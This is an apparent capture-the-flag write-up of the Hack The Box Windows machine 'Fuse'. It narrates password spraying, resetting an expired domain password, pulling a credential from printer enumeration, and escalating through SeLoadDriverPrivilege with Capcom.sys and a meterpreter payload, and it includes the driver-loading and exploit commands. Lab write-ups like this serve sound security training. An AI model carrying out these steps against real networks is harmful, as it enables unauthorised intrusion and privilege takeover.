Summary
Fuse is a medium-rated windows machine created by egre55. Initial foothold is gained by discovering an expired password that can be changed in order to get access to SMB shares and RPCClient. A user shell is obtained by enumerating the printer in RPCClient and determine a password used by one of the users. Administrative privileges is obtained by abusing SeLoadDriverPrivilege.
Reconnaissance
Nmap scan results show common ports for LDAP such as port 445,139(smb), 135(rpc), 88(kerberos), and an HTTP service on port(80).
Visiting the http port redirects me to http://fuse.fabricorp.local/papercut/logs/csv which was unreachable.
I added it to my hosts file in order to be able to browse the page.
Now we can see a print logger page with some links that can be useful to us.
I downloaded the CSV files to look for any useful information.
The files contain the same information that can be found on the PaperCut page. It seems like we have possible users that we can use.
I did some string manipulation and directed the output to a file to clean up a little more.
Finally, we have our users.
Initial Foothold
I tried various techniques in order to find a password that I can use for the users that I found such as GetNPUsers from impacket and also tried logging in to smb and rpcclient without a password but I was not able to get any more information. My last resort was to create a wordlist by using cewl on the webpage. But unfortunately, I did not find any match. After a few hours, while looking at the csv files, I noticed the file Fabricorp01.docx. I checked the password file that I created using cewl and Fabricorp01 was not in the list.
I tried using this password and successfully found a match.
Users tlavel, and bhult are both hits for the password ‘Fabricorp01’.
Upon authenticating to smbclient and rpcclient, I get an error that says password must change. After a few google searches, I found a way to change the password.
Using smbpasswd, I changed the password for tlavel and used it to login to rpcclient and smbclient.
I was only able to gain access to the print$ and SYSVOL share.
The print$ share only has files and drivers for the printer. I tried looking through all the possible files that may contain any password or new information that can be of any use but I did not find any.
Gaining User Access
Enumerating rpc-client gave me new users that I added to my current list.
By querying each user, I found out that only svc-print has logged on by looking at the logon_count of each users. So it is highly possible that he is the one that we need to get a shell as.
For some reason, enumerating the printer with ‘fuse.htb’ as the host gives me an error, but when I tried using the actual IP instead, I was able to enumerate it and find a password.
I tried logging in to evil-winrm and I successfully logged in and grabbed the user flag.
Privilege Escalation
This is pretty straightforward but requires several steps in order to exploit. Checking the privileges of our current user gives us the key to escalating privileges. We can see that we have SeLoadDriverPrivilege enabled.
After a few minutes of research, I was able to find something that I can try out and ended up working in the end. The article on abusing this privilege can be found here.
Basically, we will need 4 files in order to gain administrative privileges.
- Capcom.sys
- LoadDriver.exe
- ExploitCapcom.exe
- shell.exe (meterpreter payload)
The main job of the exploit is to load the capcom.sys into the registry and start a service that we can exploit.
First, I compiled the ExploitCapcom code using Visual Studio. I changed one value on the code on line 292. Originally, the path is
‘C:\\Windows\\system32\\cmd.exe’. I changed it to where I will be putting my meterpreter payload so the exploit executes that instead.
Visual studio will build the project on Debug mode by default. In order for the load driver to work, it needs to be changed to ‘Release’ before building.
For the driver loader, I created a new project since the github repo only has the C++ code in it. No changes are necessary on the driver loader. Just compile the project as is and it will be good to go.
I transferred the compiled executables to my kali machine and created my meterpreter payload as well as downloaded the Capcom.sys file.
Now time to transfer all the files to the target machine and start the exploitation. I transferred the files using the upload feature in evil-winrm.
I started a Metasploit multi/handler in order to be prepared to catch the shell after exploitation.
After running the commands required. A session started on my meterpreter.
a) ./loaddriver.exe System\CurrentControlSet\TestService C:\Users\svc-print\AppData\Local\Temp\Capcom.sys
b) ./ExploitCapcom.exe
We can drop a shell or stay in meterpreter to grab the root flag.
That is it for Fuse! Thank you for reading and have a good day!
